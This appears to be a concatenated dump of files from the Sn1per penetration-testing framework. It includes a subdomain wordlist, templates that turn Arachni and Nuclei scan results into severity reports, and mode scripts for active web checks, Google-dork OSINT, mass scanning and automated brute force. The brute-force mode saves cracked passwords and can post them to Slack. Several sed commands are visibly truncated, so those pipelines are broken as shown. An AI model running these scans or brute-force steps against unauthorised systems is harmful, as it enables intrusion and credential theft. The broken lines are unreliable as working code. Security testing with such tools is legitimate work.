35 | dhcp
36 | direct
37 | dmz
38 | dns
39 | dns0
40 | dns1
41 | dns2
42 | download
43 | en
44 | erp
45 | eshop
46 | exchange
47 | f5
48 | fileserver
49 | firewall
50 | forum
51 | ftp
52 | ftp0
53 | git
54 | gw
55 | help
56 | helpdesk
57 | home
58 | host
59 | http
60 | id
61 | images
62 | info
63 | internal
64 | internet
65 | intra
66 | intranet
67 | ipv6
68 | lab
69 | ldap
70 | linux
71 | local
72 | localhost
73 | log
74 | m
75 | mail
76 | mail2
77 | mail3
78 | mailgate
79 | main
80 | manage
81 | mgmt
82 | mirror
83 | mobile
84 | monitor
85 | mssql
86 | mta
87 | mx
88 | mx0
89 | mx1
90 | mysql
91 | news
92 | noc
93 | ns
94 | ns0
95 | ns1
96 | ns2
97 | ns3
98 | ntp
99 | old
100 | ops
101 | oracle
102 | owa
103 | pbx
104 | portal
105 | s3
106 | secure
107 | server
108 | sharepoint
109 | shop
110 | sip
111 | smtp
112 | sql
113 | squid
114 | ssh
115 | ssl
116 | stage
117 | staging
118 | stats
119 | status
120 | svn
121 | syslog
122 | test
123 | test1
124 | test2
125 | testing
126 | uat
127 | upload
128 | v1
129 | v2
130 | v3
131 | vm
132 | vnc
133 | voip
134 | vpn
135 | web
136 | web2test
137 | whois
138 | wiki
139 | www
140 | www2
141 | xml
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Arachni_Vulnerability_Scan.disabled:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Arachni Vulnerability Scan'
3 | FILENAME="${LOOT_DIR}/web/arachni_webscan_${TARGET}_*.txt"
4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
5 |
6 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
7 | rm -f /tmp/report.txt 2> /dev/null
8 | touch /tmp/report.txt 2> /dev/null
9 | x=0
10 | cat $FILENAME 2> /dev/null | egrep 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' | sed 's/\n//g' | sed -r 's/ /dev/null | tr -d '"' > /tmp/out 2> /dev/null
11 |
12 | # DELETE FIRST LINE
13 | sed -i '1d' /tmp/out 2> /dev/null
14 |
15 | cat /tmp/out 2> /dev/null | while read line; do
16 | x=$(( x+1 ))
17 | if [ $x -eq "1" ]; then
18 | echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
19 | elif [ $x -eq "2" ]; then
20 | if [[ $line =~ .*Critical.* ]]; then
21 | echo "P1 - CRITICAL," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
22 | elif [[ $line =~ .*High.* ]]; then
23 | echo "P2 - HIGH," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
24 | elif [[ $line =~ .*Medium.* ]]; then
25 | echo "P3 - MEDIUM," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
26 | elif [[ $line =~ .*Low.* ]]; then
27 | echo "P4 - LOW," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
28 | elif [[ $line =~ .*Informational.* ]]; then
29 | echo "P5 - INFO," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
30 | fi
31 | elif [ $x -eq "3" ]; then
32 | echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
33 | elif [ $x -eq "4" ]; then
34 | echo "$line" >> /tmp/report.txt 2> /dev/null
35 | x=0
36 | fi
37 | done
38 | cat /tmp/report.txt 2> /dev/null | awk -F',' '{print $2 ", " $1 ", " $3 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt
39 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Arachni_Vulnerability_Scan_-_HTTP.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Arachni Vulnerability Scan - HTTP'
3 | FILENAME="$LOOT_DIR/web/arachni-$TARGET-webscan-http.txt"
4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
5 |
6 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
7 | rm -f /tmp/report.txt 2> /dev/null
8 | touch /tmp/report.txt 2> /dev/null
9 | x=0
10 | cat $FILENAME 2> /dev/null | egrep 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' | sed 's/\n//g' | sed -r 's/ /dev/null | tr -d '"' > /tmp/out 2> /dev/null
11 |
12 | # DELETE FIRST LINE
13 | sed -i '1d' /tmp/out 2> /dev/null
14 |
15 | cat /tmp/out 2> /dev/null | while read line; do
16 | x=$(( x+1 ))
17 | if [ $x -eq "1" ]; then
18 | echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
19 | elif [ $x -eq "2" ]; then
20 | if [[ $line =~ .*Critical.* ]]; then
21 | echo "P1 - CRITICAL," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
22 | elif [[ $line =~ .*High.* ]]; then
23 | echo "P2 - HIGH," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
24 | elif [[ $line =~ .*Medium.* ]]; then
25 | echo "P3 - MEDIUM," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
26 | elif [[ $line =~ .*Low.* ]]; then
27 | echo "P4 - LOW," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
28 | elif [[ $line =~ .*Informational.* ]]; then
29 | echo "P5 - INFO," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
30 | fi
31 | elif [ $x -eq "3" ]; then
32 | echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
33 | elif [ $x -eq "4" ]; then
34 | echo "$line" >> /tmp/report.txt 2> /dev/null
35 | x=0
36 | fi
37 | done
38 | cat /tmp/report.txt 2> /dev/null | awk -F',' '{print $2 ", " $1 ", " $3 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt
39 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Arachni_Vulnerability_Scan_-_HTTPS.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Arachni Vulnerability Scan - HTTPS'
3 | FILENAME="$LOOT_DIR/web/arachni-$TARGET-webscan-https.txt"
4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
5 |
6 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
7 | rm -f /tmp/report.txt 2> /dev/null
8 | touch /tmp/report.txt 2> /dev/null
9 | x=0
10 | cat $FILENAME 2> /dev/null | egrep 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' | sed 's/\n//g' | sed -r 's/ /dev/null | tr -d '"' > /tmp/out 2> /dev/null
11 |
12 | # DELETE FIRST LINE
13 | sed -i '1d' /tmp/out 2> /dev/null
14 |
15 | cat /tmp/out 2> /dev/null | while read line; do
16 | x=$(( x+1 ))
17 | if [ $x -eq "1" ]; then
18 | echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
19 | elif [ $x -eq "2" ]; then
20 | if [[ $line =~ .*Critical.* ]]; then
21 | echo "P1 - CRITICAL," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
22 | elif [[ $line =~ .*High.* ]]; then
23 | echo "P2 - HIGH," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
24 | elif [[ $line =~ .*Medium.* ]]; then
25 | echo "P3 - MEDIUM," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
26 | elif [[ $line =~ .*Low.* ]]; then
27 | echo "P4 - LOW," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
28 | elif [[ $line =~ .*Informational.* ]]; then
29 | echo "P5 - INFO," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
30 | fi
31 | elif [ $x -eq "3" ]; then
32 | echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null
33 | elif [ $x -eq "4" ]; then
34 | echo "$line" >> /tmp/report.txt 2> /dev/null
35 | x=0
36 | fi
37 | done
38 | cat /tmp/report.txt 2> /dev/null | awk -F',' '{print $2 ", " $1 ", " $3 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt
39 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
--------------------------------------------------------------------------------
/modes/sc0pe-active-webscan.sh:
--------------------------------------------------------------------------------
1 | for file in `ls $INSTALL_DIR/templates/active/*.sh 2> /dev/null`; do
2 | source $file
3 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
4 | if [[ "$SSL" == "true" ]]; then
5 | if [[ -z "$PORT" ]]; then
6 | PORT="443"
7 | fi
8 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null
9 | curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "https://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,https://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
10 | else
11 | if [[ -z "$PORT" ]]; then
12 | PORT="80"
13 | fi
14 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null
15 | curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "http://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,http://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
16 | fi
17 | rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
18 | done
--------------------------------------------------------------------------------
/modes/osint_stage_2.sh:
--------------------------------------------------------------------------------
1 | if [[ $SCAN_TYPE == "DOMAIN" ]] && [[ $OSINT == "1" ]]; then
2 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
3 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
4 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
5 | fi
6 | if [[ $GOOHAK = "1" ]]; then
7 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
8 | echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET"
9 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
10 | goohak $TARGET > /dev/null
11 | fi
12 | if [[ $INURLBR = "1" ]]; then
13 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
14 | echo -e "$OKRED RUNNING INURLBR OSINT QUERIES $RESET"
15 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
16 | php /usr/share/sniper/bin/inurlbr.php --dork "site:$TARGET" -s inurlbr-$TARGET | tee $LOOT_DIR/osint/inurlbr-$TARGET
17 | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/osint/inurlbr-$TARGET > $LOOT_DIR/osint/inurlbr-$TARGET.txt 2> /dev/null
18 | rm -f $LOOT_DIR/osint/inurlbr-$TARGET
19 | rm -Rf output/ cookie.txt exploits.conf
20 | fi
21 | GHDB="1"
22 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
23 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
24 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
25 | fi
26 | fi
27 |
--------------------------------------------------------------------------------
/modes/sc0pe-network-scan.sh:
--------------------------------------------------------------------------------
1 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
2 | echo -e "$OKRED RUNNING SC0PE NETWORK VULNERABILITY SCAN $RESET"
3 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
4 | for file in `ls $INSTALL_DIR/templates/passive/network/*.sh 2> /dev/null`; do
5 | source $file
6 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
7 | if [[ "$SEARCH" == "negative" ]]; then
8 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
9 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
10 | else
11 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
12 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $FILENME - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
13 | fi
14 | rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
15 | done
16 |
17 | for file in `ls $INSTALL_DIR/templates/passive/network/recursive/*.sh 2> /dev/null`; do
18 | source $file
19 | done
20 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
--------------------------------------------------------------------------------
/pro/notepad.html:
--------------------------------------------------------------------------------
1 |
2 |
3 | Notepad App
4 |
5 |
6 |
12 |
13 |
14 |
19 |
36 |
37 |
--------------------------------------------------------------------------------
/modes/bruteforce.sh:
--------------------------------------------------------------------------------
1 | if [[ "$AUTO_BRUTE" = "1" ]]; then
2 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_bruteforce.txt 2> /dev/null
3 | ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
4 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
5 | echo -e "$OKRED RUNNING BRUTE FORCE $RESET"
6 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
7 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
8 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
9 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
10 | fi
11 | brutex $TARGET | tee $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null
12 | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null > $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null
13 | rm -f $LOOT_DIR/credentials/brutex-$TARGET
14 | cd $INSTALL_DIR
15 | rm -f hydra.restore
16 | rm -f scan.log
17 | CRACKED=$(egrep -h -i -s password $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null | grep host 2> /dev/null)
18 | if [[ ${#CRACKED} -ge 5 ]]; then
19 | echo "$CRACKED" > $LOOT_DIR/output/cracked-$TARGET.txt 2> /dev/null
20 | fi
21 | echo ""
22 | rm -f $LOOT_DIR/scans/running_${TARGET}_bruteforce.txt 2> /dev/null
23 | ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
24 |
25 | if [[ "$SLACK_NOTIFICATIONS_BRUTEFORCE" == "1" ]]; then
26 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/credentials/brutex-$TARGET.txt"
27 | fi
28 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
29 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
30 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
31 | fi
32 | else
33 | echo -e "$OKORANGE + -- --=[ AUTO_BRUTE setting disabled in sniper.conf... skipping.$RESET"
34 | fi
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTP.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Nuclei Vulnerability Scan - HTTP'
3 | FILENAME="$LOOT_DIR/web/nuclei-http-$TARGET-port*.txt"
4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
5 | GREP_OPTIONS='-ih'
6 |
7 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
8 | MATCH="\[critical\]"
9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P1 - CRITICAL, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
10 | MATCH="\[high\]"
11 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P2 - HIGH, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
12 | MATCH="\[medium\]"
13 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
14 | MATCH="\[low\]"
15 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
16 | MATCH="\[info\]"
17 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
18 |
19 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTPS.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Nuclei Vulnerability Scan - HTTPS'
3 | FILENAME="$LOOT_DIR/web/nuclei-https-$TARGET-port*.txt"
4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
5 | GREP_OPTIONS='-ih'
6 |
7 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
8 | MATCH="\[critical\]"
9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P1 - CRITICAL, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
10 | MATCH="\[high\]"
11 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P2 - HIGH, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
12 | MATCH="\[medium\]"
13 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
14 | MATCH="\[low\]"
15 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
16 | MATCH="\[info\]"
17 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
18 |
19 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
--------------------------------------------------------------------------------
/modes/masswebscan.sh:
--------------------------------------------------------------------------------
1 | # MASSWEB MODE #####################################################################################################
2 | if [[ "$MODE" = "masswebscan" ]]; then
3 | if [[ -z "$FILE" ]]; then
4 | logo
5 | echo "You need to specify a list of targets (ie. -f ) to scan."
6 | exit
7 | fi
8 | if [[ "$REPORT" = "1" ]]; then
9 | for a in `cat $FILE`;
10 | do
11 | if [[ ! -z "$WORKSPACE" ]]; then
12 | args="$args -w $WORKSPACE"
13 | WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
14 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
15 | mkdir -p $WORKSPACE_DIR 2> /dev/null
16 | mkdir $WORKSPACE_DIR/domains 2> /dev/null
17 | mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
18 | mkdir $WORKSPACE_DIR/nmap 2> /dev/null
19 | mkdir $WORKSPACE_DIR/notes 2> /dev/null
20 | mkdir $WORKSPACE_DIR/reports 2> /dev/null
21 | mkdir $WORKSPACE_DIR/output 2> /dev/null
22 | mkdir $WORKSPACE_DIR/vulnerabilities/ 2> /dev/null
23 | mkdir $WORKSPACE_DIR/scans/ 2> /dev/null
24 | fi
25 | args="$args -m webscan --noreport --noloot"
26 | TARGET="$a"
27 | args="$args -t $TARGET"
28 | if [[ ! -z "$WORKSPACE_DIR" ]]; then
29 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
30 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
31 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
32 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
33 | fi
34 | sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
35 | else
36 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
37 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
38 | fi
39 | args=""
40 | done
41 | fi
42 |
